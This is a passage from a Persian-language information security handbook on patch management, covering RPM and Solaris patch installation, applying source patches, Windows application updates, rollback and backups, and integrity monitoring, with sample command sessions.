‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻫﻤﺎﻥ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﺓ ﺍﺻﻠﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﭘـﻴﺶ ﺍﺯ‬
‫ﺍﻋﻤﺎﻝ ﺍﺻﻼﺣﻬﺎ‪ ،‬ﺍﻣﻀﺎﻫﺎﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺣﺘﻲ ﺍﮔﺮ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﮑﺎﺳﻲ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﻤﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ‬ ‫•‬
‫ﻛﺎﻓﻲ ﺳﺮﻳﻊ ﻧﺒﺎﺷﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﺍﺻﻼﺡ ﺍﻣﻨﻴﺘﻲ ﺧﻴﻠﻲ ﻣﻬﻢ ﻣﻨﺘﺸﺮ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻧﻴﺪ ‪ ۲۴‬ﺳﺎﻋﺖ ﺻﺒﺮ ﻛﻨﻴﺪ ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ‬
‫ﻣﺤﻞ ﺷﻤﺎ ﺑﻪﺭﻭﺯ ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺭﺍﻫﻲ ﺟﺰ ‪ download‬ﻛﺮﺩﻥ ﺍﺻﻼﺣﻬﺎ ﺑﻄﻮﺭ ﻣـﺴﺘﻘﻴﻢ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻓﺮﻭﺷـﻨﺪﺓ ﺍﺻـﻠﻲ ﻭﺟـﻮﺩ‬
‫ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺩﺭ ﺍﻋﻤﺎﻝ ﺍﺻﻼﺣﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻭ ﺑﻮﻟﺘﻨﻬﺎﻱ ﻋﻤﻮﻣﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ‪ .‬ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻟﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ‬
‫ﺍﺻﻼﺣﻬﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﻓﺮﺍﺩ ﺭﺍ ﻓﺮﻳﺐ ﺩﻫﻨﺪ ﺗﺎ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺟﺪﻳﺪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻨـﺪ‪ ،‬ﻭ ﺩﺭ ﺑﻬﺘـﺮﻳﻦ‬
‫ﻻ ﺑﻮﺳﻴﻠﻪ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺑﻲﺗﺠﺮﺑﻪﺍﻱ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺭﺍﻩﺣـﻞ‬
‫ﺣﺎﻟﺖ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ﺍﺻﻼﺡ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ ﺷﻤﺎ‪ ،‬ﺑﻪ ﺁﻥ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﺪ‪.‬‬

‫ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‬


‫ﺗﺤﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ ،Unix‬ﺍﺭﺗﻘﺎﻱ ﻳﻚ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﻓﺮﺍﻳﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺍﻱ ﺍﺳﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ bzip2-devel‬ﺩﺭ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺍﺯ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ RPM‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺩﺳﺘﻮﺭﺍﺕ ﺯﻳﺮ‬
‫ﻻﺯﻡ ﻫﺴﺘﻨﺪ‪:‬‬
‫‪# ls -l *.rpm‬‬
‫‪-rw-r--r-- 1 root root 33708 Apr 16 23:15 bzip2-devel-1.0.2-2.i386.rpm‬‬
‫‪# rpm -K bzip2-devel-1.0.2-2.i386.rpm‬‬ ‫)‪Check the checksum and signature‬‬
‫‪bzip2-devel-1.0.2-2.i386.rpm: md5 OK‬‬
‫‪# rpm -Uvh bzip2-devel-1.0.2-2.i386.rpm‬‬ ‫‪Upgrade the package‬‬
‫]‪Preparing... ########################################### [100%‬‬
‫]‪1:bzip2-devel ########################################### [100%‬‬
‫‪# rpm -q bzip2-devel‬‬ ‫‪Confirm that the version is now 1.0.2-2‬‬
‫‪bzip2-devel-1.0.2-2‬‬
‫ﻧﺼﺐ ﻳﻚ ﺍﺻﻼﺡ ﺍﻣﻨﻴﺘﻲ ‪ Solaris‬ﻧﻴﺰ ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺁﺳﺎﻥ ﺍﺳـﺖ‪ .‬ﺑﻌـﺪ ﺍﺯ ‪ download‬ﺍﺻـﻼﺡ ‪ 104489-15.tar.Z‬ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫‪ ،http://sunsolve.sun.com‬ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ installpatch‬ﺑﺮﺍﻱ ﻧﺼﺐ ﺍﺻﻼﺡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪:‬‬
‫‪% ls *.tar.Z‬‬
‫‪104489-15.tar.Z‬‬
‫‪% uncompress *.Z‬‬
‫‪% tar xf 104489-15.tar‬‬
‫‪% cd 104489-15‬‬
‫‪% ls‬‬

‫‪114 Software Availability‬‬


‫‪٣٠٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫*‪.diPatch‬‬ ‫*‪SUNWtltk/ backoutpatch* postbackout‬‬


‫*‪Install.info‬‬ ‫*‪SUNWtltkd/ installpatch* postpatch‬‬
‫‪README.104489-15 SUNWtltkm/‬‬ ‫*‪patchinfo‬‬
‫‪% su‬‬
‫‪Password: password‬‬
‫‪#./installpatch.‬‬
‫‪Checking installed patches...‬‬
‫‪Generating list of files to be patched...‬‬
‫‪Verifying sufficient filesystem capacity (exhaustive method)...‬‬
‫‪Installing patch packages...‬‬

‫‪Patch number 104489-15 has been successfully installed.‬‬


‫‪See /var/sadm/patch/104489-15/log for details‬‬
‫‪Executing postpatch script...‬‬

‫‪Patch packages installed:‬‬


‫‪SUNWtltk‬‬
‫‪SUNWtltkd‬‬
‫‪SUNWtltkm‬‬

‫‪# showrev -p | egrep 104489‬‬


‫‪Patch: 104489-01 Obsoletes: Packages: SUNWtltk, SUNWtltkd‬‬
‫‪Patch: 104489-14 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm‬‬
‫‪Patch: 104489-15 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm‬‬
‫ﺍﮔﺮ ﺍﺯ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ ﻳﺎ ﺑﻪ ﻳﻚ ﻛﻨﺘﺮﻝ ‪ CVS‬ﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﻭ ﻳـﺎ ﺑـﻪ ﺍﻋﻤـﺎﻝ‬
‫ﻳﻚ ﺍﺻﻼﺡ ﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻗﺪﻳﻤﻲ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ‪ .‬ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺗﺮﺟﻤـﻪ ﻭ ﺳـﭙﺲ‬
‫ﻧﺼﺐ ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻲ ﺍﺯ ﺍﻋﻤﺎﻝ ﻳﻚ ﺍﺻﻼﺡ ﺭﻭﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺁﻭﺭﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫* ‪% ls -ld‬‬
‫‪-rw-rw---- 1 dunemush dunemush 188423 Jul 20 12:07 1.7.5-patch09‬‬
‫‪drwx------ 10 dunemush dunemush 4096 Jul 4 16:15 pennmush/‬‬
‫‪% cd pennmush‬‬
‫‪% patch -p1 -s <../1.7.5-patch09‬‬
‫‪% make‬‬
‫‪....source code compile messages...‬‬
‫‪% make install‬‬
‫‪...installation messages...‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪%‬‬
‫ﺍﮔﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺭﺍ ﺍﺭﺗﻘﺎ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﻓﺮﺍﻳﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﻣﺘﻮﻗﻒ ﺳﺎﺯﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻜﺎﺭ ﺍﻧﺪﺍﺯﻳﺪ ﺗـﺎ ﻧـﺴﺨﻪﺍﻱ‬
‫ﮐﻪ ﺗﺎﺯﻩ ﻧﺼﺐﺷﺪﻩ‪ ،‬ﺍﺟﺮﺍ ﺷﻮﺩ ‪ -‬ﺗﻌﻮﻳﺾ ﺻﺮﻑ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﺮﺍﻱ ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻥ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺑﺎ ﻧـﺴﺨﺔ‬
‫ﻗﺪﻳﻤﻲ ﻛﻔﺎﻳﺖ ﻧﻤﻲﻛﻨﺪ‪.‬‬
‫ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻛﻤﻲ ﻧﺎﻣﺘﻌﺎﺭﻑﺗﺮ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻳﻜـﻲ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻫﺴﺘﻪﺍﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ‪ -‬ﻣﺎﻧﻨﺪ ‪ Internet Explorer‬ﻳﺎ ‪ - Media Player‬ﺑﺎﺷﻨﺪ‪ ،‬ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ‪ WindowsUpdate‬ﺍﺩﺍﺭﺓ ﺁﻧﺮﺍ ﺑﺮ‬
‫ﻋﻬﺪﻩ ﻣﻲﮔﻴﺮﺩ؛ ﺍﻣﺎ ﻫﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﻳﮕﺮﻱ ﺑﺎﻳﺪ ﺭﻭﺵ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪ .‬ﺑﻌﻀﻲﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﻣﺠﺒﻮﺭ ﻛﻨﻨـﺪ ﻛـﻪ ﻧـﺴﺨﺔ‬
‫ﻗﺪﻳﻤﻲﺗﺮ ﺭﺍ ‪ uninstall‬ﻛﻨﻴﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﺳﺖ ﮐﻪ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﺑﺮﺍﻱ ﺑﻌﻀﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛـﺎﻓﻲ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﻧﺴﺨﻪ ﺟﺪﻳﺪ ﺭﺍ ﺭﻭﻱ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺳﺎﻳﺮﻳﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻧﺪ ﺍﺭﺗﻘﺎﻱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺑﺮﻧﺎﻣﻪ‪-‬‬
‫ﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ(‪ .‬ﺷﻤﺎ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﻪ ﺭﻭﺵ ﻣﺨﺼﻮﺹ ﺁﻥ ﻋﻤﻞ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٠٦‬‬

‫ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﺑﻪ ﻋﻘﺐ ﻭ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‬


‫ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻫﻤﻴﺸﻪ ﭼﺎﺭﺓ ﻛﺎﺭ ﻧﻴﺴﺖ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺭﺗﻘﺎﻫﺎ ﺑﻴﺶ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺣﻞ ﻣﻲﻛﻨﻨﺪ ﻣﻮﺟﺐ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺟﺪﻳﺪ ﺩﺭ ﺳﻴﺴﺘﻢ‬
‫ﻣﻲﺷﻮﻧﺪ؛ ﻳﺎ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻣﻬﻢ ﺭﺍ ﻣﺘﻮﻗﻒ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻣﻮﺟﺐ ﺍﺻﻼﺡ ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻤﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻣﺸﺨﺺ ﺷﻮﺩ ﺍﺭﺗﻘﺎﻱ ﺍﻋﻤﺎﻝ ﺷﺪﻩ ﺣﺎﻭﻱ ﻣﺸﻜﻼﺕ ﺍﺳﺖ ﺑﺘﻮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻞ ﺍﺯ ﺍﺭﺗﻘﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪.‬‬
‫ﺩﻭ ﺭﺍﻫﻜﺎﺭ ﺍﺑﺘﺪﺍﻳﻲ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﻳﻚ ﺍﺭﺗﻘﺎﻱ ﺧﺮﺍﺏ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻥ ﺍﺻﻼﺡ ﺭﺍ ﺑﻪ ﻋﻘﺐ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ ﻭ ﻧﺴﺨﺔ ﻗﺒﻠـﻲ‬
‫ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺍﺣﻴﺎ ﻛﺮﺩ‪ .‬ﺗﺤﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﺍﺻﻼﺡ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺣﺬﻑ ﻳﻚ ﺍﺻﻼﺡ ﺍﻋﻤﺎﻝﺷﺪﻩ ﻗﺒﻠﻲ ﻧﻴﺰ ﺑﻜـﺎﺭ ﺭﻭﺩ‪ ،‬ﻳـﺎ‬
‫ﻧﺴﺨﻪ ﻗﺒﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺨﺰﻥ ‪ CVS‬ﺑﺎﺯﻳﺎﻓﺖ ﮔﺮﺩﺩ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻴﻠﻲ ﺳﺨﺖ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﺳـﺎﻟﻢ ﻭ‬
‫ﺑﻲﺩﺭﺩﺳﺮ ﺑﻪ ﻋﻘﺐ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪ .‬ﻫﺮﭼﻨﺪ ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧـﺼﺐﺷـﺪﻩ ﺑـﺎ ﻳـﻚ‬
‫ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﻭﺍﺑﺴﺘﮕﻴﻬﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻫﻢ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ ﺑﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻛﻪ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲﺗـﺮ‬
‫ﺍﻳﻦ ﻭﺍﺑﺴﺘﮕﻴﻬﺎ ﻫﻢ ﭘﻴﺪﺍ ﻭ ﻧﺼﺐ ﺷﻮﻧﺪ‪ .‬ﺑﻴﺸﺘﺮ )ﺍﻣﺎ ﻧﻪ ﻫﻤﺔ( ﺍﺻﻼﺣﻬﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ ﺭﺍ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺧـﻮﺩ ﺭﺍ‬
‫‪ uninstall‬ﻛﻨﻨﺪ ﻭ ﻳﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺍﻱ ‪ uninstall‬ﻛﺮﺩﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺭﺍﻫﻜﺎﺭ ﺩﻭﻡ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ‪ ،‬ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺳﺖ‪ .‬ﺑﺎ ﻧﮕﻬﺪﺍﺭﻱ ﻧﺴﺨﻪﻫـﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻋﻤﻮﻣﹰﺎ ﻧﺼﺐ ﻣﺠﺪﺩ ﻧﺴﺨﺔ ﻗﺒﻠﻲ ﻛﺎﺭ ﭼﻨﺪﺍﻥ ﻣﺸﻜﻠﻲ ﻧﻴﺴﺖ‪ .‬ﭼﻨﺪﻳﻦ ﻧﺴﺨﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺷـﺎﺧﻪﻫـﺎﻱ ﻣﺠـﺰﺍ ﺩﺭ ‪/usr/src‬‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ‪ ،‬ﻳﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻧﺴﺨﻪ ﻣﺎﻧﻨﺪ ‪ RCS‬ﻳﺎ ‪ CVS‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﭼﻨﺪﻳﻦ ﻧﺴﺨﻪ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ‬
‫ﻳﻚ ﺷﺎﺧﻪ ﻭﺍﺣﺪ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﺷﺎﻳﺪ ﻣﻄﻤﺌﻦﺗﺮﻳﻦ ﺭﻭﺵ‪ ،‬ﺗﻬﻴﺔ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﭘﻴﺶ ﺍﺯ ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺎﺷﺪ ﺗﺎ ﭼﻨﺎﻧﭽﻪ ﻧﺼﺐ ﺍﺭﺗﻘﺎ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻧﺠﺎﻡ‬
‫ﻧﺸﺪ ﺑﺘﻮﺍﻥ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻠﻲ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪.‬‬

‫ﻧﻈﺎﺭﺕ ﺑﺮ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻧﺼﺐ‬


‫ﺯﻣﺎﻧﻴﻜﻪ ﺍﺻﻼﺣﻬﺎﻱ ﺟﺪﻳﺪ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ ﻳﻚ ﻗﺴﻤﺖ ﻣﻬـﻢ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻳﻜﭙـﺎﺭﭼﮕﻲ‬
‫ﺍﺳﺖ‪ .‬ﻧﻜﺘﺔ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻣﻬﻢ ﺍﺳﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺳﻴـﺴﺘﻢ ‪ -‬ﻭ ﺍﻃﻼﻋـﺎﺕ ﺑـﺎ ﺍﺭﺯﺵ ﺷـﻤﺎ ‪-‬‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻳﺪ ﺗﻐﻴﻴﺮ ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻫﻴﭻ ﻛﺎﺭﺑﺮ ﻳﺎ ﭘﺮﺩﺍﺯﺓ ﻏﻴﺮﻣﺠﺎﺯﻱ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﺪ‪ .‬ﺩﺭ ﻋﻤﻞ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﺑﺮ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺑﻄﻮﺭ ﻣﺪﺍﻭﻡ ﻧﻈﺎﺭﺕ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﺭﺍ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻛﺸﻒ ﻭ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺁﺭﺷﻴﻮ ﻧﻤﺎﻳﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻠﻲ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ‪.‬‬

